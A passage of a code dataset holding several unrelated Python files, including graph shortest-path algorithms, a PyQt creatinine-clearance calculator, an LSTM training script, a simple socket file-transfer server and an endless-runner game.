forward_message=forward_message)\r\n\r\nif __name__ == '__main__':\r\n    app.run(host='127.0.0.1', port=7000, debug=True)","repo_name":"himanshukholiya/upload_resume_portal","sub_path":"connectatlas.py","file_name":"connectatlas.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12675152901","text":"# time it takes for every node to receive the signal\n# whether every node can be reached\nimport collections\nimport heapq\n\n\nclass NetworkDelayTime:\n    def getNetworkDelayTime(self, network: [[]], N: int, start_node: int) -> int:\n        graph = collections.defaultdict(list)\n\n        for u, v, w in network:\n            graph[u].append((v, w))  # graph[2] = (1, 1)\n\n        Q = [(0, start_node)]\n        dist = collections.defaultdict(int)\n\n        while Q:\n            time, node = heapq.heappop(Q)\n            if node not in dist:\n                dist[node] = time\n                for v, w in graph[node]:\n                    alt = time + w\n                    heapq.heappush(Q, (alt, v))\n\n        if len(dist) == N:\n            return max(dist.values())\n\n\nnetwork = [[2, 1, 1], [2, 3, 1], [3, 4, 1]]\ninstance = NetworkDelayTime()\ninstance.getNetworkDelayTime(network, 4, 2)\n","repo_name":"HONOOUR/Algorithm_Test","sub_path":"Algorithm_Python/NetworkDelayTime.py","file_name":"NetworkDelayTime.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71536371761","text":"from heapq import heappop, heappush\n\n\n# Data structure to store graph edges\nclass Path:\n    def __init__(self, source, dest, weight):\n        self.source = source\n        self.dest = dest\n        self.weight = weight\n\n\n# Data structure to store heap nodes\nclass Node:\n    def __init__(self, vertex, weight):\n        self.vertex = vertex\n        self.weight = weight\n\n    # Override the __lt__() function to make `Node` class work with min heap\n    def __lt__(self, other):\n        return self.weight < other.weight\n\n\n# class to represent a graph object\nclass Graph:\n    def __init__(self, paths, N):\n        # allocate memory for the adjacency list\n        self.adj = [[] for _ in range(N)]\n        # add paths to the undirected graph by Index or Node u\n        for path in paths:\n            self.adj[path.source].append(path)\n\n\ndef get_route(prev, i, route):\n    if i >= 0:\n        get_route(prev, prev[i], route)\n        route.append(i)\n\n\n# Run Dijkstra's algorithm on given graph\ndef shortest_path(graph, source, N):\n    # create min heap and push source node having distance 0\n    pq = []\n    heappush(pq, Node(source, 0))\n    # set distance from source to v infinite initially\n    dist = [float('inf')] * N\n\n    # distance from source to itself is zero\n    dist[source] = 0\n\n    # list to track vertices for which minimum cost is already found\n    visited = [False] * N\n    visited[source] = True\n\n    # stores predecessor of a vertex (to print path)\n    prev = [-1] * N\n    route = []\n\n    # run till min heap is empty\n    while pq:\n\n        node = heappop(pq)  # Remove and return best vertex\n        u = node.vertex  # get vertex number\n\n        # do for each neighbor v of u\n        for path in graph.adj[u]:\n            v = path.dest\n            weight = dist[u] + path.weight\n\n            # Relaxation step\n            if not visited[v] and weight < dist[v]:\n                dist[v] = weight\n                prev[v] = u\n                heappush(pq, Node(v, dist[v]))\n\n        # mark vertex u as visited\n        visited[u] = True\n\n    for i in range(1, N):\n        if i != source and dist[i] != float('inf'):\n            get_route(prev, i, route)\n            # print(f\"Path ({source} -> {i}): Minimum Cost = {dist[i]}, Route = {route}\")\n            route.clear()\n\n\nif __name__ == '__main__':\n    # initialize paths as per above diagram\n    # (u, v, w) triplet represents an undirected path 
from\n    # vertex u to vertex v having weight w\n    paths = [Path(0, 1, 10), Path(0, 4, 3), Path(1, 2, 2),\n             Path(1, 4, 4), Path(2, 3, 9), Path(3, 2, 7),\n             Path(4, 1, 1), Path(4, 2, 8), Path(4, 3, 2)]\n\n    # Set number of vertices in the graph\n    N = 5\n\n    # construct graph\n    graph = Graph(paths, N)\n\n    source = 0\n    shortest_path(graph, source, N)\n\n# Path (0 -> 1): Minimum Cost = 4, Route = [0, 4, 1]\n# Path (0 -> 2): Minimum Cost = 6, Route = [0, 4, 1, 2]\n# Path (0 -> 3): Minimum Cost = 5, Route = [0, 4, 3]\n# Path (0 -> 4): Minimum Cost = 3, Route = [0, 4]","repo_name":"Koubae/Algorithm-Complete-Guide","sub_path":"Algorithms/src/Graph-Algorithms/Dijkstra/Python/dijkstra_1.py","file_name":"dijkstra_1.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"43167437932","text":"import sys\nfrom PyQt5 import QtWidgets,QtCore,QtGui\n\nfrom Ui_Ccr_main import *\n\nclass Ccr_MainWin(QtWidgets.QWidget):\n    \n    def __init__(self,parent=None):\n        super().__init__(parent)\n        self.ui = Ui_Ccr()\n        self.a = self.ui.setupUi(self)\n        self.ini_set() # load the initial window settings\n\n    def ini_set(self):\n        self.center() # center the window\n        self.input_valid() # restrict the input formats\n        self.ui.pushButton.clicked.connect(self.check_data_miss) # connect the button to the calculation slot\n\n    # center the window on the screen\n    def center(self): \n        screen = QtWidgets.QApplication.desktop()\n        size = self.geometry()\n        self.move((screen.width() - size.width())/2,(screen.height() - size.height())/2) \n\n    # limit the format of the input data\n    def input_valid(self):\n        self.ui.lineEdit.setValidator(QtGui.QIntValidator(1,100))\n        self.ui.lineEdit_2.setValidator(QtGui.QDoubleValidator(15.0,500.0,2))\n        self.ui.lineEdit_3.setValidator(QtGui.QDoubleValidator(1.0,200.0,2))\n    \n    # check for missing input fields\n    def check_data_miss(self):\n        data_miss =[] # container for the missing fields\n        data_miss_str='' # string listing the missing fields\n\n        if self.ui.lineEdit.text()=='':\n            data_miss.append('age,')\n        if self.ui.lineEdit_2.text()=='':\n            data_miss.append('weight,')\n        if self.ui.lineEdit_3.text()=='':\n            data_miss.append('serum creatinine,')\n\n        if len(data_miss) != 0: # is anything missing?\n            data_miss[-1]=data_miss[-1][0:-1]+'.' 
# replace the trailing comma with a period\n            for i in range (len(data_miss)):\n                data_miss_str=data_miss_str+data_miss[i] \n            QtWidgets.QMessageBox.warning(self,'Missing required data','Missing fields: '+data_miss_str) # warn the user about the missing fields\n        else: # nothing missing, run the calculation\n            self.caculate()\n\n    \n    # perform the final Ccr calculation\n    def caculate(self):\n        \n        gender = 1.0 # gender factor\n        if self.ui.radioButton.isChecked()==True:\n            gender=1.0\n        else:\n            gender=0.85\n        age = int(self.ui.lineEdit.text()) # get the age\n        weight = float(self.ui.lineEdit_2.text()) # get the weight\n        cr = float(self.ui.lineEdit_3.text()) # get the serum creatinine\n\n        ccr = (140-age)*weight/(0.818*cr)*gender # Cockcroft-Gault: (140-age)*weight/(0.818*Scr), x0.85 for women\n        self.ui.label_7.setText(str(ccr)) # show the result\n\n\ndef main():\n    app = QtWidgets.QApplication(sys.argv)\n    main = Ccr_MainWin()\n    main.show()\n    sys.exit(app.exec_())\nif __name__ == \"__main__\":\n    main()","repo_name":"mawang98/Ccr_caculator","sub_path":"Ccr_Qt.py","file_name":"Ccr_Qt.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"70485192563","text":"import multiprocessing as mp\nimport traceback\nfrom typing import Optional, Tuple\n\n\nclass ProcessWithException(mp.Process):\n    \"\"\"\n    to be treated same as usual multiprocessing process, with\n    p = Process(target=target, args=args)\n    p.start()\n    p.join()\n    p.print_and_raise_if_has_exception()\n\n    extended from stack overflow https://stackoverflow.com/a/33599967/11837276\n    \"\"\"\n    _exception: Optional[Tuple[Exception, str]]\n\n    def __init__(self, *args, **kwargs):\n        mp.Process.__init__(self, *args, **kwargs)\n        self._pconn, self._cconn = mp.Pipe()\n        self._exception = None\n\n    def run(self):\n        try:\n            mp.Process.run(self)\n            self._cconn.send(None)\n        except Exception as e:\n            tb = traceback.format_exc()\n            self._cconn.send((e, tb))\n            # raise e  # You can still raise this exception if you need to\n\n    @property\n    def exception(self) -> Tuple[Exception, str]:\n        if self._pconn.poll():\n            self._exception = self._pconn.recv()\n        return self._exception\n\n    def print_and_raise_if_has_exception(self):\n        if self.exception is None:\n            return\n        print(\"=\" * 30 + \"\\n\")\n        print(\"=\" * 30 + \"\\n\")\n        print(\"=\" * 30 + \"\\n\")\n        print(self.exception[1])\n        raise self.exception[0]\n","repo_name":"tjangoW/computerSitTimer","sub_path":"computerSitTimer/MultiprocessingWithException.py","file_name":"MultiprocessingWithException.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"27883839935","text":"import numpy as np\r\nimport pandas as pd\r\nimport lstm_enc_dec\r\nimport torch\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndf = pd.DataFrame(pd.read_csv(\"preprocessed1.csv\"))\r\ndf.head()\r\n\r\ndf.info()\r\n\r\nY = df['M_RAIN_PERCENTAGE']\r\nnumpred = df['Num_Predictions'].max()\r\nX = df[['M_TRACK_TEMPERATURE', 'M_TRACK_LENGTH','M_FORECAST_ACCURACY', 'M_AIR_TEMPERATURE','M_NUM_WEATHER_FORECAST_SAMPLES', 'M_TRACK_ID','M_SEASON_LINK_IDENTIFIER', 'M_WEATHER_FORECAST_SAMPLES_M_SESSION_TYPE', 'M_WEATHER_FORECAST_SAMPLES_M_WEATHER','M_WEATHER_FORECAST_SAMPLES_M_TRACK_TEMPERATURE','M_TRACK_TEMPERATURE_CHANGE','M_WEATHER_FORECAST_SAMPLES_M_AIR_TEMPERATURE','M_AIR_TEMPERATURE_CHANGE']]\r\nX_train, X_test, y_train, y_test = train_test_split(X,Y, test_size = 0.2, random_state = 42)\r\nprint(X_train.shape)\r\nprint(y_train.shape)\r\n\r\nx_torch_train = torch.from_numpy(X_train.to_numpy()).type(torch.Tensor)\r\nx_torch_test = torch.from_numpy(X_test.to_numpy()).type(torch.Tensor)\r\ny_torch_train = 
torch.from_numpy(y_train.to_numpy().reshape(-1,1)).type(torch.Tensor)\r\ny_torch_test = torch.from_numpy(y_test.to_numpy()).type(torch.Tensor)\r\nx_torch_train = torch.reshape(x_torch_train,(5,571565,x_torch_train.shape[1]))\r\ny_torch_train = torch.reshape(y_torch_train,(5,571565,y_torch_train.shape[1]))\r\nprint(x_torch_train.shape)\r\nprint(y_torch_train.shape)\r\n\r\n#device =torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\ndevice = torch.device('cpu')\r\nmodel = lstm_enc_dec.lstm_seq2seq(input_size = x_torch_train.shape[2], hidden_size = 7)\r\nmodel.to(device)\r\nx_torch_train.to(device)\r\nx_torch_test.to(device)\r\ny_torch_train.to(device)\r\ny_torch_test.to(device)\r\nloss = model.train_model(x_torch_train, y_torch_train, n_epochs = 50, target_len = 5, batch_size = 200, training_prediction = 'recursive', teacher_forcing_ratio = 0.6, learning_rate = 0.01, dynamic_tf = False)\r\n\r\nprint(loss)\r\n\r\nimport pickle\r\nwith open('model.pkl', 'wb') as model_file:\r\n pickle.dump(model, model_file)","repo_name":"ishdh/FormulaAI2022","sub_path":"model_train.py","file_name":"model_train.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7102914586","text":"from math import inf\n\nfrom . import Abstraction\nfrom utils import *\n\n\nclass CompositeAbstraction(Abstraction):\n def __init__(self, abstractions):\n if isinstance(abstractions[0], tuple):\n self.abstractions = [a(op) for a, op in abstractions]\n else:\n self.abstractions = abstractions\n\n def __str__(self):\n string = \"[\"\n for i, abstraction in enumerate(self.abstractions):\n if i > 0:\n string += \", \"\n string += str(abstraction)\n return string + \"]\"\n\n def long_str(self):\n string = \"Composite: [\"\n comma = \"\"\n for abstraction in self.abstractions:\n string += comma + abstraction.long_str()\n comma = \", \"\n string += \"]\"\n return string\n\n def short_str(self):\n string = \"Composite: [\"\n comma = \"\"\n for abstraction in self.abstractions:\n string += comma + abstraction.short_str()\n comma = \", \"\n string += \"]\"\n return string\n\n def __len__(self):\n return len(self.abstractions)\n\n def initialize(self, n_watched_neurons):\n for abstraction in self.abstractions:\n abstraction.initialize(n_watched_neurons)\n\n def add(self, class_id, vector):\n for abstraction in self.abstractions:\n abstraction.add(class_id, vector)\n\n def finalize(self):\n for abstraction in self.abstractions:\n abstraction.finalize()\n\n def isknown(self, vector, skip_confidence=False, novelty_mode=False):\n # average\n if COMPOSITE_ABSTRACTION_POLICY == 0:\n confidence_known = 0.0\n n_known = 0\n confidence_unknown = 0.0\n n_unknown = 0\n for abstraction in self.abstractions:\n result, confidence = abstraction.isknown(vector, skip_confidence=skip_confidence,\n novelty_mode=novelty_mode)\n if result:\n n_known += 1\n confidence_known += confidence\n else:\n n_unknown += 1\n confidence_unknown += confidence\n\n # determine winner\n if n_known > 0:\n confidence_known /= float(n_known)\n if n_unknown > 0:\n confidence_unknown /= float(n_unknown)\n total_confidence = confidence_known + confidence_unknown # normalization factor\n if confidence_known > confidence_unknown:\n return True, confidence_known / total_confidence\n else:\n return False, confidence_unknown / total_confidence\n # maximum\n elif COMPOSITE_ABSTRACTION_POLICY == 1:\n highest_confidence = -1.0\n for abstraction in self.abstractions:\n result, 
confidence = abstraction.isknown(vector)\n                if result:\n                    return result, confidence\n                else:\n                    highest_confidence = max(highest_confidence, confidence)\n            return False, highest_confidence\n\n        else:\n            raise NotImplementedError(\"Policy {} is not available.\".format(COMPOSITE_ABSTRACTION_POLICY))\n\n    def clear(self):\n        for abstraction in self.abstractions:\n            abstraction.clear()\n\n    def add_finalized(self, class_id, vector):\n        for abstraction in self.abstractions:\n            abstraction.add_finalized(class_id, vector)\n\n    def default_options(self):\n        return [(type(a), a.default_options()) for a in self.abstractions],  # needs to be a tuple\n\n    def update_clustering(self, clusters):\n        for abstraction in self.abstractions:\n            abstraction.update_clustering(clusters)\n\n    def add_clustered(self, values, clusterer):\n        clusters = clusterer.predict(values)\n        cluster2values = dict()\n        for vj, cj in zip(values, clusters):\n            if cj in cluster2values.keys():\n                cluster2values[cj].append(vj)\n            else:\n                cluster2values[cj] = [vj]\n        for cj, clustered_values in cluster2values.items():\n            self.add_clustered_to_set(clustered_values, cj, self.mean_computer(clusterer, cj))\n\n    def add_clustered_to_set(self, values, cj, mean_computer):\n        for abstraction in self.abstractions:\n            abstraction.add_clustered_to_set(values, cj, mean_computer)\n\n    def closest_mean_dist(self, vector):\n        min_distance = inf\n        for abstraction in self.abstractions:\n            min_distance = min(min_distance, abstraction.closest_mean_dist(vector))\n        return min_distance\n\n    def plot(self, dims, color, ax):\n        for abstraction in self.abstractions:\n            abstraction.plot(dims, color, ax)\n\n    def isempty(self):\n        for abstraction in self.abstractions:\n            if not abstraction.isempty():\n                return False\n        return True\n","repo_name":"VeriXAI/Outside-the-Box","sub_path":"abstractions/CompositeAbstraction.py","file_name":"CompositeAbstraction.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"}
{"seq_id":"8026862339","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n# server\n\nimport socket,os,hashlib\nserver = socket.socket()\nhost = socket.gethostname()\nport = 9999\n# server.bind(('localhost',9999))\nserver.bind((host,port))\n\nserver.listen()\n\nwhile True:\n    conn,addr = server.accept()\n    print('New Conn:',addr)\n    while True:\n        print(\"Waiting for a new command...\")\n        data = conn.recv(1024)\n        if not data:\n            print(\"Client disconnected.\")\n            break\n        cmd,filename = data.decode().split()\n        print(filename)\n        if os.path.isfile(filename):\n            f = open(filename,\"rb\")\n            m = hashlib.md5()\n            file_size = os.stat(filename).st_size\n            conn.send(str(file_size).encode())\n            conn.recv(1024)\n            for line in f:\n                m.update(line)\n                conn.send(line)\n            print(\"file md5\",m.hexdigest())\n            f.close()\n            conn.send(m.hexdigest().encode())\n            print(\"send done\")\nserver.close()","repo_name":"huyuedong/travel","sub_path":"08/ftp_md5/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"31679876399","text":"\"\"\"This file is what is run to start the program. 
This file mainly includes\n    Mode Handling (self-made)\n    2D Visuals\n    Collisions\n    Power Ups\n    Contains many core-game attributes\"\"\"\n\n\n# from https://www.diderot.one/course/34/chapters/2808/#anchor-segment-214904\nfrom cmu_112_graphics import * #ModalApp, App, Mode\n\n\nfrom Geometry import *\nfrom Runner import *\nfrom DataManagement import *\n\n\n# built-in Python modules\nimport copy\nimport math\nimport random\n\n\"\"\"IMPORTANT CREDENTIAL NOTICE:\n    ALL IMAGES WERE SELF-DRAWN BY ANTOINE ASSAF (CREATOR OF GAME)\n\"\"\"\n\n#from @B2-1-33 www.diderot.one/course/34/chapters/2605/#anchor-atom-186051\ndef distance(x0, y0, x1, y1):\n    return math.sqrt((x1 - x0)**2 + (y1 - y0)**2)\n\n#from @B0-1-56 www.diderot.one/course/34/chapters/2288/#anchor-atom-188353 \ndef almostEqual(d1, d2, epsilon=10**-7):\n    return (abs(d2 - d1) < epsilon)\n\n#from @B0-8-115 www.diderot.one/course/34/chapters/2604/#anchor-atom-189700\ndef readFile(path): \n    with open(path, \"rt\") as f: \n        return f.read() \n\n#from @B0-8-115 www.diderot.one/course/34/chapters/2604/#anchor-atom-189700\ndef writeFile(path, contents): \n    with open(path, \"wt\") as f: \n        f.write(contents) \n\nclass MetroMastersApp(App):\n    def appStarted(self):\n\n        #essentially I will need to craft a make-shift ModalApp because the one provided by CMU lags\n        self.currentMode = \"home\"\n\n        self.cx = self.width/2\n        self.cy = self.height/2\n\n        self.transitioning = False\n        self.toMode = \"home\" #default\n        self.transitionFrame = 0\n        self.transitionFrames = 6\n        self.dF = 1\n\n        self.personalHighest = 0\n\n        self.defaultHorizonLevel = self.height/4\n        self.focus = [self.width/2,self.defaultHorizonLevel]\n        self.timerDelay = 25\n        self.cameraPos = [0,0]\n        self.scrollZ = self.timeElapsed = self.score = self.coinsCollected = 0\n        self.multiplier = 1\n        self.objects = []\n        self.coins = []\n        self.planks = []\n        self.runner = Runner(self, \"black\")\n        self.storedOldCameraPos = self.laneSwitchTime = 0\n        self.storedOldCameraFoc = self.focus[0]\n        self.levelHeight = .35 #how tall is the graphic for each level\n        self.gravity = -2.5\n        self.speed = .055\n        self.oldSpeed = 0\n        self.difficulty = 1 #goes up to 5\n        self.map = random.choice([\"MALIBU\", \"GOLDEN GATE BRIDGE\"])\n        self.possibleMoves = [\n            \"TRAIN0\", \"TRAIN1\", \"TRAIN2\",\n            \"LADDER0\", \"LADDER1\", \"LADDER2\",\n            \"DUCK0\", \"DUCK1\", \"DUCK2\",\n            \"JUMP0\", \"JUMP1\", \"JUMP2\"]\n        self.allPowerUps = [\"AI\",\"SPEEDY BOOTS\", \"DOUBLE POINTS\",\"MAGNET\"] \n        self.mouseDragPos = [[None, None],[None, None]] #start drag position, end drag position\n\n        #this essentially locates where the objects are (z where player is). 
There are 18 \"locations\" an object can be in\n #for each lane\n #there is are two levels (on ground or on train)\n #An object can be hurt someone jumping, running, or ducking\n #True means an object exists there\n self.collisionBox = [\n [[False, False, False],[False, False, False]], \n [[False, False, False],[False, False, False]],\n [[False, False, False],[False, False, False]]]\n\n #images (ALL IMAGES ARE SELF-DRAWN BY ANTOINE ASSAF)\n self.background = self.loadImage('Background.png')\n self.background = self.scaleImage(self.background, 5)\n self.logo = self.loadImage(\"Logo.png\")\n self.logo = self.scaleImage(self.logo, 1.75)\n self.button1 = self.loadImage('Button1.png')\n self.button2 = self.loadImage('Button2.png')\n self.button3 = self.loadImage('Button3.png')\n self.button1 = self.scaleImage(self.button1, .75)\n self.button2 = self.scaleImage(self.button2, .75)\n self.button3 = self.scaleImage(self.button3, .75)\n self.magnetImage = self.loadImage('Magnet.png')\n self.speedyBootsImage = self.loadImage('SpeedyBoots.png')\n self.multiplierImage = self.loadImage('Multiplier.png')\n self.AIImage = self.loadImage('AI.png')\n self.magnetImage = self.scaleImage(self.magnetImage, .65)\n self.AIImage = self.scaleImage(self.AIImage, .65)\n self.speedyBootsImage = self.scaleImage(self.speedyBootsImage, .65)\n self.multiplierImage = self.scaleImage(self.multiplierImage, .65)\n\n def createTrain(self, lane, trainLength = .3, speed = .03): \n if lane == 0:\n p1 = Point(self, .025, 1, 1.14)\n p2 = Point(self, .3, 1, 1.14)\n p3 = Point(self, .3, 1, 1.14 + trainLength)\n p4 = Point(self, .025, 1, 1.14 + trainLength)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14)\n p2 = Point(self, .5+(.275/2), 1, 1.14)\n p3 = Point(self, .5+(.275/2), 1, 1.14 + trainLength)\n p4 = Point(self, .5-(.275/2), 1, 1.14 + trainLength)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14)\n p2 = Point(self,.7, 1, 1.14)\n p3 = Point(self, .7, 1, 1.14 + trainLength)\n p4 = Point(self, 1-.025, 1, 1.14 + trainLength)\n\n color = random.choice([\"cyan\", \"purple\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n\n return Train(self, surfaces, 0, self.levelHeight, lane, speed)\n\n def createTunnel(self, tunnelLength = .1, speed = 0):\n\n tunnelObjects = []\n\n p1 = Point(self, -.5, 1, 1.14)\n p2 = Point(self, -.1, 1, 1.14)\n p3 = Point(self, -.1, 1, 1.14 + tunnelLength)\n p4 = Point(self, -.5, 1, 1.14 + tunnelLength)\n\n surfaces = []\n color = \"gray\"\n \n tunnelObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, self.levelHeight*3, -1, 0)]\n\n p1 = Point(self, 1.1, 1, 1.14)\n p2 = Point(self, 1.5, 1, 1.14)\n p3 = Point(self, 1.5, 1, 1.14 + tunnelLength)\n p4 = Point(self, 1.1, 1, 1.14 + tunnelLength)\n\n tunnelObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, self.levelHeight*3, 3, 0)]\n\n height = self.levelHeight * 3\n p1 = Point(self, -.5, 1, 1.14,h = height)\n p2 = Point(self, 1.5, 1, 1.14, h = height)\n p3 = Point(self, 1.5, 1, 1.14 + tunnelLength, h = height)\n p4 = Point(self, -.5, 1, 1.14 + tunnelLength, h = height)\n\n tunnelObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, height + self.levelHeight, 1, 0)]\n\n return tunnelObjects\n\n def createBridge(self, houseLength = .025, speed = 0):\n\n houseObjects = []\n \n color = \"red\"\n\n p1 = Point(self, -1.75, 1, 1.14)\n p2 = Point(self, -1.25, 1, 1.14)\n p3 = Point(self, -1.25, 1, 1.14 + houseLength)\n p4 = Point(self, -1.75, 1, 1.14 + houseLength)\n \n 
houseObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, self.levelHeight*10, -2, 0, False)]\n\n p1 = Point(self, 2.25, 1, 1.14)\n p2 = Point(self, 2.75, 1, 1.14)\n p3 = Point(self, 2.75, 1, 1.14 + houseLength)\n p4 = Point(self, 2.25, 1, 1.14 + houseLength)\n\n \n houseObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, self.levelHeight*10, 4, 0, False)]\n\n return houseObjects\n\n\n def createLadder(self, lane, barrierLength = .05, speed = .03):\n\n ladderObjects = []\n height = -.06\n for i in range(-1, 4, 2):\n height += .12\n if lane == 0:\n p1 = Point(self, .025, 1, 1.14 - barrierLength, h = height)\n p2 = Point(self, .3, 1, 1.14 - barrierLength, h = height)\n p3 = Point(self, .3, 1, 1.14, h = height)\n p4 = Point(self, .025, 1, 1.14, h = height)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14 - barrierLength, h = height)\n p2 = Point(self, .5+(.275/2), 1, 1.14 - barrierLength, h = height)\n p3 = Point(self, .5+(.275/2), 1, 1.14, h = height)\n p4 = Point(self, .5-(.275/2), 1, 1.14,h = height)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14+barrierLength,h = height)\n p2 = Point(self,.7, 1, 1.14+barrierLength,h = height)\n p3 = Point(self, .7, 1, 1.14,h = height)\n p4 = Point(self, 1-.025, 1, 1.14,h = height)\n\n color = random.choice([\"grey\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n if i == -1:\n ladderObjects += [Ladder(self, surfaces, 0, height + .04, lane, speed)] \n else:\n ladderObjects += [Ladder(self, surfaces, 0, height + .04, lane, speed)] \n\n\n\n return ladderObjects\n \n def createJumpBarrier(self, lane, barrierLength = .05):\n if lane == 0:\n p1 = Point(self, .025, 1, 1.14)\n p2 = Point(self, .3, 1, 1.14)\n p3 = Point(self, .3, 1, 1.14 + barrierLength)\n p4 = Point(self, .025, 1, 1.14 + barrierLength)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14)\n p2 = Point(self, .5+(.275/2), 1, 1.14)\n p3 = Point(self, .5+(.275/2), 1, 1.14 + barrierLength)\n p4 = Point(self, .5-(.275/2), 1, 1.14+ barrierLength)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14)\n p2 = Point(self,.7, 1, 1.14)\n p3 = Point(self, .7, 1, 1.14 + barrierLength)\n p4 = Point(self, 1-.025, 1, 1.14 + barrierLength)\n\n color = random.choice([\"pink\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n\n return JumpBarrier(self, surfaces, 0, .2, lane, 0)\n\n def createDuckBarrier(self, lane, barrierLength = .05):\n height = .2\n if lane == 0:\n p1 = Point(self, .025, 1, 1.14, h = height)\n p2 = Point(self, .3, 1, 1.14,h = height)\n p3 = Point(self, .3, 1, 1.14 + barrierLength,h = height)\n p4 = Point(self, .025, 1, 1.14 + barrierLength,h = height)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14,h = height)\n p2 = Point(self, .5+(.275/2), 1, 1.14,h = height)\n p3 = Point(self, .5+(.275/2), 1, 1.14 + barrierLength,h = height)\n p4 = Point(self, .5-(.275/2), 1, 1.14+ barrierLength,h = height)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14,h = height)\n p2 = Point(self,.7, 1, 1.14,h = height)\n p3 = Point(self, .7, 1, 1.14 + barrierLength,h = height)\n p4 = Point(self, 1-.025, 1, 1.14 + barrierLength,h = height)\n\n color = random.choice([\"red\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n part1 = DuckBarrier(self, surfaces, 0, height + .2, lane, 0)\n\n if lane == 0:\n p1 = Point(self, .025, 1, 1.14)\n p2 = Point(self, .05, 1, 1.14)\n p3 = Point(self, .05, 1, 1.14 + barrierLength)\n p4 = Point(self, .025, 1, 1.14 + barrierLength)\n elif 
lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14)\n p2 = Point(self, .5-(.275/2) + .025, 1, 1.14)\n p3 = Point(self, .5-(.275/2) + .025, 1, 1.14 + barrierLength)\n p4 = Point(self, .5-(.275/2), 1, 1.14+ barrierLength)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14)\n p2 = Point(self,1-.05, 1, 1.14)\n p3 = Point(self, 1-.05, 1, 1.14 + barrierLength)\n p4 = Point(self, 1-.025, 1, 1.14 + barrierLength)\n\n color = random.choice([\"red\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n part2 = Decoration(self, surfaces, 0, height + .2, lane, 0)\n\n if lane == 0:\n p1 = Point(self, .3-.025, 1, 1.14)\n p2 = Point(self, .3, 1, 1.14)\n p3 = Point(self, .3, 1, 1.14 + barrierLength)\n p4 = Point(self, .3-.025, 1, 1.14 + barrierLength)\n elif lane == 1:\n p1 = Point(self, .5+(.275/2), 1, 1.14)\n p2 = Point(self, .5+(.275/2) - .025, 1, 1.14)\n p3 = Point(self, .5+(.275/2) - .025, 1, 1.14 + barrierLength)\n p4 = Point(self, .5+(.275/2), 1, 1.14+ barrierLength)\n elif lane == 2:\n p1 = Point(self, .7, 1, 1.14)\n p2 = Point(self,.725, 1, 1.14)\n p3 = Point(self, .725, 1, 1.14 + barrierLength)\n p4 = Point(self, .7, 1, 1.14 + barrierLength)\n\n color = random.choice([\"red\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n part3 = Decoration(self, surfaces, 0, height + .2, lane, 0) \n\n return [part1, part2, part3]\n\n def createTrainWrapper(self, lane, speed):\n self.objects.insert(0,self.createTrain(lane, .3, speed))\n\n def createLadderWrapper(self, lane, speed):\n contents = self.createLadder(lane, .01, speed)\n for content in contents:\n try:\n self.objects.insert(12,content)\n except:\n self.objects.insert(1,content)\n\n def createTunnelWrapper(self):\n contents = self.createTunnel()\n for content in contents:\n self.objects.insert(0,content)\n\n def createBridgeWrapper(self):\n contents = self.createBridge()\n for content in contents:\n self.objects.insert(0,content)\n\n\n def createDuckBarrierWrapper(self, lane):\n contents = self.createDuckBarrier(lane, .01)\n for content in contents:\n self.objects.insert(0,content)\n\n def createJumpBarrierWrapper(self, lane):\n self.objects.insert(0,self.createJumpBarrier(lane, .01))\n\n def randomizeMoves(self):\n newOrder = []\n clone = copy.copy(self.possibleMoves)\n while len(clone) > 0:\n newOrder += [clone.pop(random.randint(0,len(clone)-1))]\n return newOrder\n\n def isLegal(self, moves):\n for move in moves:\n if moves.count(move) > 1:\n return False\n \n state = [[False, False, False], [False, False, False], [False, False, False]]\n\n for move in moves:\n lane = int(move[-1])\n if move.startswith(\"LADDER\"):\n if state[lane] != [True, True, True]:\n return False\n\n for loc, spot in enumerate(state[lane]):\n if move.startswith(\"TRAIN\"):\n if spot == True:\n return False\n else:\n state[lane][loc] = True\n if state == [[True, True, True], [True, True, True], [True, True, True]]:\n return False\n elif move.startswith(\"DUCK\"):\n if str(loc) in '12':\n if spot 